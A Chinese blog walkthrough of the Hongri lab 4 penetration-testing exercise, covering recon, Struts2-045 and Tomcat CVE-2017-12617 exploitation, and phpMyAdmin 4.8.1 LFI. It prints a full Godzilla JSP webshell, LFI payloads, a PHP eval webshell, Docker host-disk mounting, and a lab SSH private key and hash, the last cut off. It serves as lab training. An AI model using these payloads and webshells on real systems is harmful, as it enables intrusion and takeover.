当前位置:   article > 正文

红日靶场4_moz-extension://78c4a5aa-8ad4-43f2-b81c-291ad7a7ba

moz-extension://78c4a5aa-8ad4-43f2-b81c-291ad7a7ba1f/options/index.html

前言


  1. 技术要求:
  2. struts2 漏洞利用
  3. tomcat 漏洞利用
  4. phpmyadmin getshell
  5. docker逃逸
  6. ms14-068
  7. ssh密钥利用
  8. 流量转发
  9. 历史命令信息泄露
  10. 域渗透

  1. 本次靶机一共三台,一台ubuntu、一台win7域成员主机、一台dc主机
  2. ubuntu要求两张网卡,一张net网卡,一张内网仅主机网卡。net网卡:192.168.12.0 || 仅主机:192.168.183.0
  3. win7只需要一张仅主机网卡即可。IP已经是配好的。不需要动!
  4. dc也只需要一张仅主机网卡即可,和win7一样,不要动!

  1. 因为漏洞是在ubuntu的docker里面搭的,所以启动docker内漏洞
  2. 命令:sudo docker start ec 17 09 bb da 3d ab ad

外网渗透

信息收集

1、arp

  1. ┌──(root㉿ru)-[~/kali]
  2. └─# arp-scan -l
  3. Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
  4. Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
  5. 192.168.12.1 00:50:56:c0:00:08 VMware, Inc.
  6. 192.168.12.2 00:50:56:ec:d1:ca VMware, Inc.
  7. 192.168.12.132 00:0c:29:51:f4:8e VMware, Inc.
  8. 192.168.12.254 00:50:56:e9:25:0a VMware, Inc.
  9. 4 packets received by filter, 0 packets dropped by kernel
  10. Ending arp-scan 1.10.0: 256 hosts scanned in 2.363 seconds (108.34 hosts/sec). 4 responded

  1. 这是一款kali自带的一款轻量ARP扫描工具,这个工具呢,会自动解析MAC地址,可以对应硬件厂商。由于它用的是arp协议,所以还是会快一些
  2. 我觉得吧,用来扫描局域网的主机还是挺好用的,因为扫描的少,所以扫描速度还是比较快,可以很快的查看到局域网有哪些主机和对应的MAC地址。
  3. 扫描到主机后,再配合Nmap使用,更加方便。
  4. 也可以用netdiscoveru或者masscan。

2、nmap

端口探测
  1. ┌──(root㉿ru)-[~/kali]
  2. └─# nmap -p- 192.168.12.132 --min-rate 10000 -oA port
  3. Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-13 10:31 CST
  4. Nmap scan report for 192.168.12.132
  5. Host is up (0.0019s latency).
  6. Not shown: 65531 closed tcp ports (reset)
  7. PORT STATE SERVICE
  8. 22/tcp open ssh
  9. 2001/tcp open dc
  10. 2002/tcp open globe
  11. 2003/tcp open finger
  12. MAC Address: 00:0C:29:51:F4:8E (VMware)
  13. Nmap done: 1 IP address (1 host up) scanned in 5.64 seconds
  14. 快速提权端口信息
  15. ┌──(root㉿ru)-[~/kali]
  16. └─# cat port.nmap | awk '{print $1}' | head -n 9 | tail -n 4 | awk -F "/" '{print $1}' | xargs -n 4 | sed 's/ /,/g'
  17. 22,2001,2002,2003

信息探测
  1. ┌──(root㉿ru)-[~/kali]
  2. └─# nmap -sC -sV -sT -O -A -p 22,2001,2002,2003 192.168.12.132 --min-rate 10000 -oA XX
  3. Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-13 10:33 CST
  4. Nmap scan report for 192.168.12.132
  5. Host is up (0.00034s latency).
  6. PORT STATE SERVICE VERSION
  7. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
  8. | ssh-hostkey:
  9. | 1024 6d:1e:e7:55:ee:d7:2b:22:d7:6b:68:67:df:39:f5:7b (DSA)
  10. | 2048 5e:ca:2c:70:8f:a2:0c:bf:10:d7:26:2b:15:5f:3f:58 (RSA)
  11. | 256 de:b5:6a:a8:24:6a:13:45:cc:87:21:c3:c2:ee:b2:10 (ECDSA)
  12. |_ 256 8e:02:ca:99:6e:c2:eb:8f:0c:5c:bb:c9:b2:f5:06:4d (ED25519)
  13. 2001/tcp open http Jetty 9.2.11.v20150529
  14. |_http-server-header: Jetty(9.2.11.v20150529)
  15. | http-cookie-flags:
  16. | /:
  17. | JSESSIONID:
  18. |_ httponly flag not set
  19. |_http-title: Struts2 Showcase - Fileupload sample
  20. 2002/tcp open http Apache Tomcat 8.5.19
  21. |_http-title: Apache Tomcat/8.5.19
  22. |_http-favicon: Apache Tomcat
  23. 2003/tcp open http Apache httpd 2.4.25 ((Debian))
  24. | http-robots.txt: 1 disallowed entry
  25. |_/
  26. |_http-title: 192.168.12.132:2003 / mysql | phpMyAdmin 4.8.1
  27. |_http-server-header: Apache/2.4.25 (Debian)
  28. MAC Address: 00:0C:29:51:F4:8E (VMware)
  29. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  30. Device type: general purpose
  31. Running: Linux 3.X|4.X
  32. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
  33. OS details: Linux 3.2 - 4.9
  34. Network Distance: 1 hop
  35. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  36. TRACEROUTE
  37. HOP RTT ADDRESS
  38. 1 0.34 ms 192.168.12.132
  39. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  40. Nmap done: 1 IP address (1 host up) scanned in 14.95 seconds

  1. 这时我们可以看到structs2的指纹信息
  2. 2001:struts2
  3. 2002:Tomcat/8.5.19
  4. 2003:phpMyAdmin 4.8.1

  1. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
  2. 2001/tcp open http Jetty 9.2.11.v20150529
  3. 2002/tcp open http Apache Tomcat 8.5.19
  4. 2003/tcp open http Apache httpd 2.4.25 ((Debian))

漏洞探测
  1. ┌──(root㉿ru)-[~/kali]
  2. └─# nmap --script=vuln -p 22,2001,2002,2003 192.168.12.132 --min-rate 10000 -oA vuln
  3. Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-13 10:38 CST
  4. Pre-scan script results:
  5. | broadcast-avahi-dos:
  6. | Discovered hosts:
  7. | 224.0.0.251
  8. | After NULL UDP avahi packet DoS (CVE-2011-1002).
  9. |_ Hosts are all up (not vulnerable).
  10. Nmap scan report for 192.168.12.132
  11. Host is up (0.00025s latency).
  12. PORT STATE SERVICE
  13. 22/tcp open ssh
  14. 2001/tcp open dc
  15. 2002/tcp open globe
  16. 2003/tcp open finger
  17. MAC Address: 00:0C:29:51:F4:8E (VMware)
  18. Nmap done: 1 IP address (1 host up) scanned in 34.41 seconds
  19. 漏洞探测没有扫除什么,dos攻击的优先级最后!

3、nikto

  1. ┌──(root㉿ru)-[~/kali]
  2. └─# nikto -h 192.168.12.132 nikto.txt
  3. - Nikto v2.5.0
  4. ---------------------------------------------------------------------------
  5. ---------------------------------------------------------------------------
  6. + 0 host(s) tested

漏洞利用

1、struts2
  1. ┌──(root㉿ru)-[~/tools/loudong/Struts2/STS2G]
  2. └─# ./ST2G --url http://192.168.12.132:2001/ --mode scan
  3. 未指定漏洞编号,默认全检测
  4. Struts2-001 Not Vulnerable.
  5. Struts2-005 Not Vulnerable.
  6. Struts2-007 Not Vulnerable.
  7. Struts2-008 Not Vulnerable.
  8. Struts2-009 Not Vulnerable.
  9. Struts2-012 Not Vulnerable.
  10. Struts2-013 Not Vulnerable.
  11. Struts2-015 Not Vulnerable.
  12. Struts2-016 Not Vulnerable.
  13. *Found Struts2-045
  14. panic: runtime error: invalid memory address or nil pointer dereference
  15. [signal SIGSEGV: segmentation violation code=0x1 addr=0x40 pc=0x69481e]
  16. goroutine 1 [running]:
  17. ST2G/cvemod/s046.Check({0x7ffd5d59d583, 0x1b})
  18. /root/tools/loudong/Struts2/STS2G/cvemod/s046/s2-046.go:28 +0x25e
  19. main.main.func1(0xc00009d400?)
  20. /root/tools/loudong/Struts2/STS2G/ST2SG.go:143 +0x1fa
  21. github.com/urfave/cli/v2.(*App).RunContext(0xc00012c000, {0x850ca0?, 0xacbe60}, {0xc000080050, 0x5, 0x5})
  22. /root/go/pkg/mod/github.com/urfave/cli/v2@v2.1.1/app.go:311 +0x962
  23. github.com/urfave/cli/v2.(*App).Run(...)
  24. /root/go/pkg/mod/github.com/urfave/cli/v2@v2.1.1/app.go:211
  25. main.main()
  26. /root/tools/loudong/Struts2/STS2G/ST2SG.go:218 +0x545

  1. ┌──(root㉿ru)-[~/tools/loudong/Struts2/STS2G]
  2. └─# ./ST2G --url http://192.168.12.132:2001/ --mode exec --vn 45 --cmd 'ls -al /'
  3. total 72
  4. drwxr-xr-x 1 root root 4096 Jan 22 2020 .
  5. drwxr-xr-x 1 root root 4096 Jan 22 2020 ..
  6. -rwxr-xr-x 1 root root 0 Jan 22 2020 .dockerenv
  7. drwxr-xr-x 1 root root 4096 Sep 12 2019 bin
  8. drwxr-xr-x 2 root root 4096 Sep 8 2019 boot
  9. drwxr-xr-x 5 root root 340 Dec 13 01:49 dev
  10. drwxr-xr-x 1 root root 4096 Jan 22 2020 etc
  11. drwxr-xr-x 2 root root 4096 Sep 8 2019 home
  12. drwxr-xr-x 1 root root 4096 Sep 10 2019 lib
  13. drwxr-xr-x 2 root root 4096 Sep 10 2019 lib64
  14. drwxr-xr-x 2 root root 4096 Sep 10 2019 media
  15. drwxr-xr-x 2 root root 4096 Sep 10 2019 mnt
  16. drwxr-xr-x 2 root root 4096 Sep 10 2019 opt
  17. dr-xr-xr-x 261 root root 0 Dec 13 01:49 proc
  18. drwx------ 1 root root 4096 Oct 12 2019 root
  19. drwxr-xr-x 3 root root 4096 Sep 10 2019 run
  20. drwxr-xr-x 1 root root 4096 Sep 12 2019 sbin
  21. drwxr-xr-x 2 root root 4096 Sep 10 2019 srv
  22. dr-xr-xr-x 13 root root 0 Dec 13 01:49 sys
  23. drwxrwxrwt 1 root root 4096 Sep 14 2019 tmp
  24. drwxr-xr-x 1 root root 4096 Sep 10 2019 usr
  25. drwxr-xr-x 1 root root 4096 Sep 10 2019 var
  26. 在根目录发现 .dockerenv 目录,说明这些web应用运行在docker里面。我们也可以利用这个命令执行进行反弹shell,这里具体就不演示了,我们接着往下看!

https://github.com/xfiftyone/STS2G/tree/mastericon-default.png?t=N7T8https://github.com/xfiftyone/STS2G/tree/master



访问2001端口,是一个上传页面!

2、tomcat


可以看到tomcat的版本信息,我们进行searchsploit搜索一下。

  1. 搜索
  2. ┌──(root㉿ru)-[~/kali]
  3. └─# searchsploit tomcat 8.5.19
  4. ---------------------------------------------- ---------------------------------
  5. Exploit Title | Path
  6. ---------------------------------------------- ---------------------------------
  7. Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8 | jsp/webapps/42966.py
  8. Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8 | windows/webapps/42953.txt
  9. ---------------------------------------------- ---------------------------------
  10. Shellcodes: No Results

  1. 下载
  2. ┌──(root㉿ru)-[~/kali]
  3. └─# searchsploit -m 42966.py
  4. Exploit: Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)
  5. URL: https://www.exploit-db.com/exploits/42966
  6. Path: /usr/share/exploitdb/exploits/jsp/webapps/42966.py
  7. Codes: CVE-2017-12617
  8. Verified: True
  9. File Type: Python script, ASCII text executable
  10. Copied to: /root/kali/42966.py

  1. 使用说明
  2. ┌──(root㉿ru)-[~/kali]
  3. └─# python 42966.py -h
  4. Usage:
  5. _______ ________ ___ ___ __ ______ __ ___ __ __ ______
  6. / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
  7. | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
  8. | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
  9. | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
  10. \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
  11. ./cve-2017-12617.py [options]
  12. options:
  13. -u ,--url [::] check target url if it's vulnerable
  14. -p,--pwn [::] generate webshell and upload it
  15. -l,--list [::] hosts list
  16. [+]usage:
  17. ./cve-2017-12617.py -u http://127.0.0.1
  18. ./cve-2017-12617.py --url http://127.0.0.1
  19. ./cve-2017-12617.py -u http://127.0.0.1 -p pwn
  20. ./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
  21. ./cve-2017-12617.py -l hotsts.txt
  22. ./cve-2017-12617.py --list hosts.txt
  23. [@intx0x80]
  24. Options:
  25. -h, --help show this help message and exit
  26. -u U, --url=U Website Url
  27. -p P, --pwn=P generate webshell and upload it
  28. -l L, --list=L hosts File

  1. ┌──(root㉿ru)-[~/kali]
  2. └─# python 42966.py -u http://192.168.12.132:2002/
  3. _______ ________ ___ ___ __ ______ __ ___ __ __ ______
  4. / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
  5. | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
  6. | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
  7. | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
  8. \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
  9. [@intx0x80]
  10. Poc Filename Poc.jsp
  11. File Created ..
  12. http://192.168.12.132:2002/ it's Vulnerable to CVE-2017-12617
  13. http://192.168.12.132:2002//Poc.jsp
  14. 我们就成功的把jsp木马上传进去了!

  1. ┌──(root㉿ru)-[~/kali]
  2. └─# python 42966.py -u http://192.168.12.132:2002/ -p pwn
  3. _______ ________ ___ ___ __ ______ __ ___ __ __ ______
  4. / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
  5. | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
  6. | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
  7. | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
  8. \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
  9. [@intx0x80]
  10. Uploading Webshell .....
  11. $ id
  12. b"
  13. \n
  14. \n
  15. \n
  16. \n \n \n
  17. uid=0(root) gid=0(root) groups=0(root)
  18. -p这个参数的意思就是生成一个webshell并自动上传。上传完毕会自动给我们一个shell,访问页面也会给我们一个shell。


  1. tomcat漏洞有很多,我们也可以尝试一下别的方式,比如PUT木马上传等。
  2. 这个靶机的tomcat对put和head协议是没有进行过滤!

2.1 PUT上传木马
  1. 先用哥斯拉生成一个jsp木马文件
  2. <%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><% try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(pageContext.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", new String(data));Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(pageContext);response.getWriter().write(md5.substring(0,16));response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}%>





这种方式也是可行的!
3、phpmyadmin


不需要账号密码,直接就可以访问到后台!


在这可以找到phpmyadmin的版本信息,那么我们再次去搜索一下。

  1. ┌──(root㉿ru)-[~/kali]
  2. └─# searchsploit phpmyadmin 4.8.1
  3. ---------------------------------------------- ---------------------------------
  4. Exploit Title | Path
  5. ---------------------------------------------- ---------------------------------
  6. phpMyAdmin 4.8.1 - (Authenticated) Local File | php/webapps/44924.txt
  7. phpMyAdmin 4.8.1 - (Authenticated) Local File | php/webapps/44928.txt
  8. phpMyAdmin 4.8.1 - Remote Code Execution (RCE | php/webapps/50457.py
  9. ---------------------------------------------- ---------------------------------
  10. Shellcodes: No Results

  1. ┌──(root㉿ru)-[~/kali]
  2. └─# searchsploit -m 44924.txt
  3. Exploit: phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1)
  4. URL: https://www.exploit-db.com/exploits/44924
  5. Path: /usr/share/exploitdb/exploits/php/webapps/44924.txt
  6. Codes: CVE-2018-12613
  7. Verified: True
  8. File Type: ASCII text
  9. Copied to: /root/kali/44924.txt

  1. poc
  2. The latest version downloaded from the official website, the file name is phpMyAdmin-4.8.1-all-languages.zip
  3. The problem appears in /index.php
  4. Find 55~63 lines
  5. Line 61 contains include $_REQUEST['target'];
  6. This is obviously LFI precursor, as long as we bypass the 55 to 59 restrictions on the line
  7. Line 57 restricts the target parameter from beginning with index
  8. Line 58 limit target parameter cannot appear within $target_blacklist
  9. Find the definition of $target_blacklist :
  10. In /index.php the first of 50 lines
  11. As long as the target parameter is not import.php or export.php, the last limit is Core::checkPageValidity($_REQUEST['target'])
  12. Find the checkPageValidity method of the Core class :
  13. Defined in the \ libraries \ classes \ core.php on the 443 line
  14. The problem is in urldecode() on line 465
  15. We can use this function to bypass the white list detection!
  16. I ? Twice url encoded as % 253f can bypass the validation!
  17. Payload:
  18. http://127.0.0.1/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../windows/wininit.ini
  19. - - -
  20. I thought the loophole was over, because I didn't find out where phpmyadmin could perform file operations to implement Getshell . After several weeks of inspiration, I thought of a way to get Shell without writing files .
  21. We all know that after login phpmyadmin , the database is completely controllable, then we can write the WebShell to the database and then include the database file?
  22. Tested locally, I found that if you use WebShell as the field value of the data table can be perfectly written to the database file:
  23. Find the corresponding database file:
  24. Include:
  25. Payload:
  26. http://127.0.0.1/phpmyadmin/index.php?a=phpinfo();&target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/hack/hack.frm

  1. payload
  2. http://192.168.12.132:2003/index.php?target=db_sql.php%253f/../../../../../../etc/passwd



  1. payload
  2. 因为我们写入的东西都会存在sessions里面,我们只需要利用文件包含sessions即可。而且phpmyadmin的sessions默认存储路径是 /tmp/sess_{you session}
  3. select "<?php phpinfo();?>"
  4. http://192.168.12.132:2003/index.php?target=db_sql.php%253f/../../../../../../tmp/sess_64ad69b15f4f7d02f846c23aa56907fa



  1. 测试成功,我们直接写入木马也是可以的。

  1. select '<?php file_put_contents("shell.php", "<?php @eval(\$_POST[shell]);?>");?>';
  2. new session = 16415f93a193eedf3e233d01ecbc4f49
  3. http://192.168.12.132:2003/index.php?target=db_sql.php%253f/../../../../../../tmp/sess_16415f93a193eedf3e233d01ecbc4f49




phpmyadmin利用成功!

docker逃逸

  1. Docker逃逸漏洞目前已知有
  2. Dirty Cow(CVE-2016-5195)是Linux内核中的权限提升漏洞
  3. CVE-2019-5736
  4. emote api 未授权访问
  5. 这里的CVE-2019-5736是可以使用的,不过需要另外下载poc,我这里演示另外一种方式,手动挂载宿主磁盘进行ssh登录。
  6. CVE-2019-5736的poc用的是go语言,所以使用这个poc还需下载go并配置go

1、挂载宿主磁盘
  1. /usr/local/tomcat/ >fdisk -l
  2. Disk /dev/sda: 10 GiB, 10737418240 bytes, 20971520 sectors
  3. Units: sectors of 1 * 512 = 512 bytes
  4. Sector size (logical/physical): 512 bytes / 512 bytes
  5. I/O size (minimum/optimal): 512 bytes / 512 bytes
  6. Disklabel type: dos
  7. Disk identifier: 0x00063af9
  8. Device Boot Start End Sectors Size Id Type
  9. /dev/sda1 * 2048 16779263 16777216 8G 83 Linux
  10. /dev/sda2 16781310 20969471 4188162 2G 5 Extended
  11. /dev/sda5 16781312 20969471 4188160 2G 82 Linux swap / Solaris
  12. /usr/local/tomcat/ >

  1. 因为手动挂载宿主磁盘需要root权限,所以我们使用之前打进去的哥斯拉终端。
  2. 使用 fdisk -l 确认了宿主磁盘,我们直接开搞!


  1. 1、mkdir /shell
  2. 2、chmod 777 /shell
  3. 3、mount /dev/sda1 /shell
  4. 4、ls /shell


这样我们就挂载成功了!


  1. -----BEGIN RSA PRIVATE KEY-----
  2. Proc-Type: 4,ENCRYPTED
  3. DEK-Info: AES-128-CBC,6DC4277EB4DC1AF7B2C02CAD8F8E85E2
  4. OnKLlXLp+VZ0pH/2lC1/m6/gFViUBJV8I4YugGWShDjmOZ8vpsC/q+vUDtH5pkkj
  5. uFu237oUmhvmtCpSuhHaEVu+URPMh/0v7SnVTJzPvXAyRzZrHlK2UKuyHNuP/CDC
  6. R+yVqQZ00xC6Rej2atOP9mONmNnhLIhQkoolfRrBDV5DCznHO1i7m/CgQ4Qf/LrM
  7. FhfmQJ6suEXx+AAhoK+Wk0OqUwgSqM09FPJE1FvdFy/FGgKx4OzGWPn7VBd/EkpL
  8. 3v/AENs/RVCDouRs9lUrZj7OD3BejcUgPfzBZ5v57VjMcbyhGsCtyhfLyoRDuxr/
  9. XutUzlqI94AVqTDdQtpRqOiKI6mSWK9i+hqwk1MNukZKp+2+48m6fb/AMjG4mjnQ
  10. QcNSQwuBryfQxILMVUsOvyfNT2dafn4Q77QLV9rZY6k73wdaGF2RuBwnkZpEtpau
  11. Y2Q2rUAVHl2x3UW3F3NngIWYQ8kU/Usd5hUiFicWAkdVJi2GnFemPpUGBKQgQdEz
  12. JPoUtXJSkZX5l7hxfoGse+268+qdLIHFBprPoU8JH1D4aTPG7HhJv574yxDcaRuW
  13. TUhqhTWoEq5ZkD9tJwPC6u6t/3XwHvx8OjsvCh8AiM75m0XV8Du91Q3bjmt7TzDB
  14. bGuh+1kHXB6QKFwuQ/9v2Litxg5lNDTve5CZMrQlATyi/RWE1eyujxpnbFOL1TmH
  15. 6LHinYX4I1bWA2O3rFzBn9vj0aikVa/3aYT9rsHRu7MeNzkQBbtukkzuM7G7ZcuI
  16. /AYbTKq2o7JHhO3rbiOcd22g6ME80JhVlXUNlJPk20u+RescgJKJ7RTLcLiqy08Q
  17. Hepnetq8ijwmRl7DYYDTBry30HpD/JdBbL6OsstGj+uSM50okPGN+9fNemDzITfW
  18. Dj9aN8kHZfIxQxvlx0eK28Kxe7oF/NAIvpV3Exm7zBooBzNqHM3HkphZHwjKSWWN
  19. sZsW4d1VuTRLapTQRYPtOAS5ZCH6tVDIvQU9g8ksxQb5a/MSXU0NUMBnm4WOgt+T
  20. 55txs6Plcys+GCLzdD/7EeFiuNlIZ4eyQCBC8jN4azPm+ZWOR+P3zHLPRyTGhm8Y
  21. JHr0aGgIbJ4Qm+JGrz0cIA3No5FciEtPxq1hAkstn93ZBeXkpIGtyI3CrfPdLSo1
  22. l6Ki1V/Uj+rLq3IqLi4anxVZ15EK+xED2Ql3F7GeWZ1SN69wCPvniSPrpK/0hPbj
  23. bO7sWbxBJO26o2kog451oyr0i32xEXrhfaurdCCjWIruC/eFY/b6ANNI5a34Uks3
  24. fXhZLC2q2wnTh/02wzKoWZkfiams/PqiUPHYncp6DQ8D2dHOup3Kr28nNJR+sdUX
  25. m/FXcuyargJYyJ0ChyIb+1RnmcLIedxX/m8Nmy+FKb8d36ailr9al2f0HcKNPfv8
  26. a8FhDStxj2lDUzbdp4q0cqq5Ys6MkTyY6eoxEqGqaqj2EeKnqzd4NydW8bTHfzFo
  27. ml853a7WQEIcH8g+3RX1HvmXP+PgQBZvqksFMthqCPb/8jGC6zjj0//VJSrfpyaC
  28. SfxA7VOc8I1Wpg2rYC1e336DdxIF1PYUqxYKPtMe+vc5S24V6Nuttvkfrtv3MTW8
  29. -----END RSA PRIVATE KEY-----

2、ssh_rsa爆破
  1. ssh2john
  2. ┌──(root㉿ru)-[~/kali]
  3. └─# vim id_rsa
  4. ┌──(root㉿ru)-[~/kali]
  5. └─# cat id_rsa
  6. -----BEGIN RSA PRIVATE KEY-----
  7. Proc-Type: 4,ENCRYPTED
  8. DEK-Info: AES-128-CBC,6DC4277EB4DC1AF7B2C02CAD8F8E85E2
  9. OnKLlXLp+VZ0pH/2lC1/m6/gFViUBJV8I4YugGWShDjmOZ8vpsC/q+vUDtH5pkkj
  10. uFu237oUmhvmtCpSuhHaEVu+URPMh/0v7SnVTJzPvXAyRzZrHlK2UKuyHNuP/CDC
  11. R+yVqQZ00xC6Rej2atOP9mONmNnhLIhQkoolfRrBDV5DCznHO1i7m/CgQ4Qf/LrM
  12. FhfmQJ6suEXx+AAhoK+Wk0OqUwgSqM09FPJE1FvdFy/FGgKx4OzGWPn7VBd/EkpL
  13. 3v/AENs/RVCDouRs9lUrZj7OD3BejcUgPfzBZ5v57VjMcbyhGsCtyhfLyoRDuxr/
  14. XutUzlqI94AVqTDdQtpRqOiKI6mSWK9i+hqwk1MNukZKp+2+48m6fb/AMjG4mjnQ
  15. QcNSQwuBryfQxILMVUsOvyfNT2dafn4Q77QLV9rZY6k73wdaGF2RuBwnkZpEtpau
  16. Y2Q2rUAVHl2x3UW3F3NngIWYQ8kU/Usd5hUiFicWAkdVJi2GnFemPpUGBKQgQdEz
  17. JPoUtXJSkZX5l7hxfoGse+268+qdLIHFBprPoU8JH1D4aTPG7HhJv574yxDcaRuW
  18. TUhqhTWoEq5ZkD9tJwPC6u6t/3XwHvx8OjsvCh8AiM75m0XV8Du91Q3bjmt7TzDB
  19. bGuh+1kHXB6QKFwuQ/9v2Litxg5lNDTve5CZMrQlATyi/RWE1eyujxpnbFOL1TmH
  20. 6LHinYX4I1bWA2O3rFzBn9vj0aikVa/3aYT9rsHRu7MeNzkQBbtukkzuM7G7ZcuI
  21. /AYbTKq2o7JHhO3rbiOcd22g6ME80JhVlXUNlJPk20u+RescgJKJ7RTLcLiqy08Q
  22. Hepnetq8ijwmRl7DYYDTBry30HpD/JdBbL6OsstGj+uSM50okPGN+9fNemDzITfW
  23. Dj9aN8kHZfIxQxvlx0eK28Kxe7oF/NAIvpV3Exm7zBooBzNqHM3HkphZHwjKSWWN
  24. sZsW4d1VuTRLapTQRYPtOAS5ZCH6tVDIvQU9g8ksxQb5a/MSXU0NUMBnm4WOgt+T
  25. 55txs6Plcys+GCLzdD/7EeFiuNlIZ4eyQCBC8jN4azPm+ZWOR+P3zHLPRyTGhm8Y
  26. JHr0aGgIbJ4Qm+JGrz0cIA3No5FciEtPxq1hAkstn93ZBeXkpIGtyI3CrfPdLSo1
  27. l6Ki1V/Uj+rLq3IqLi4anxVZ15EK+xED2Ql3F7GeWZ1SN69wCPvniSPrpK/0hPbj
  28. bO7sWbxBJO26o2kog451oyr0i32xEXrhfaurdCCjWIruC/eFY/b6ANNI5a34Uks3
  29. fXhZLC2q2wnTh/02wzKoWZkfiams/PqiUPHYncp6DQ8D2dHOup3Kr28nNJR+sdUX
  30. m/FXcuyargJYyJ0ChyIb+1RnmcLIedxX/m8Nmy+FKb8d36ailr9al2f0HcKNPfv8
  31. a8FhDStxj2lDUzbdp4q0cqq5Ys6MkTyY6eoxEqGqaqj2EeKnqzd4NydW8bTHfzFo
  32. ml853a7WQEIcH8g+3RX1HvmXP+PgQBZvqksFMthqCPb/8jGC6zjj0//VJSrfpyaC
  33. SfxA7VOc8I1Wpg2rYC1e336DdxIF1PYUqxYKPtMe+vc5S24V6Nuttvkfrtv3MTW8
  34. -----END RSA PRIVATE KEY-----
  35. ┌──(root㉿ru)-[~/kali]
  36. └─# ssh2john id_rsa > hash
  37. ┌──(root㉿ru)-[~/kali]
  38. └─# cat hash
  39. id_rsa:$sshng$1$16$6DC4277EB4DC1AF7B2C02CAD8F8E85E2$1200$3a728b9572e9f95674a47ff6942d7f9bafe015589404957c23862e8065928438e6399f2fa6c0bfabebd40ed1f9a64923b85bb6dfba149a1be6b42a52ba11da115bbe5113cc87fd2fed29d54c9ccfbd703247366b1e52b650abb21cdb8ffc20c247ec95a90674d310ba45e8f66ad38ff6638d98d9e12c8850928a257d1ac10d5e430b39c73b58bb9bf0a043841ffcbacc1617e6409eacb845f1f80021a0af969343aa530812a8cd3d14f244d45bdd172fc51a02b1e0ecc658f9fb54177f124a4bdeffc010db3f455083a2e46cf6552b663ece0f705e8dc5203dfcc1679bf9ed58cc71bca11ac0adca17cbca8443bb1aff5eeb54ce5a88f78015a930dd42da51a8e88a23a99258af62fa1ab093530dba464aa7edbee3c9ba7dbfc03231b89a39d041c352430b81af27d0c482cc554b0ebf27cd4f675a7e7e10efb40b57dad963a93bdf075a185d91b81c27919a44b696ae636436ad40151e5db1dd45b717736780859843c914fd4b1de61522162716024755262d869c57a63e950604a42041d13324fa14b572529195f997b8717e81ac7bedbaf3ea9d2c81c5069acfa14f